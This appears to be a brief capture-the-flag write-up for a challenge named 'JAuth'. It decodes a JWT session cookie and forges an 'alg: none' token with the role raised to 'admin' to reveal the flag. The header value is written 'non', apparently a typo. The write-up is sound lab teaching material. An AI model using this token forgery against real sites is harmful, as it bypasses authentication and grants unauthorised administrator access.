Skip to content

JAuth

Upon logging in with the given test credentials, we get a JWT cookie, decoding which gives:

{
  "typ": "JWT",
  "alg": "HS256"
}

{
  "auth": 1757758147878,
  "agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
  "role": "user",
  "iat": 1757758148
}

Trying the attack in No Way JOSE challenge of Crypohack:

{
  "typ": "JWT",
  "alg": "non"
}

{
  "auth": 1757758147878,
  "agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36",
  "role": "admin",
  "iat": 1757758148
}

Encode the above to get a token, and edit the cookie. Reloading displays the flag!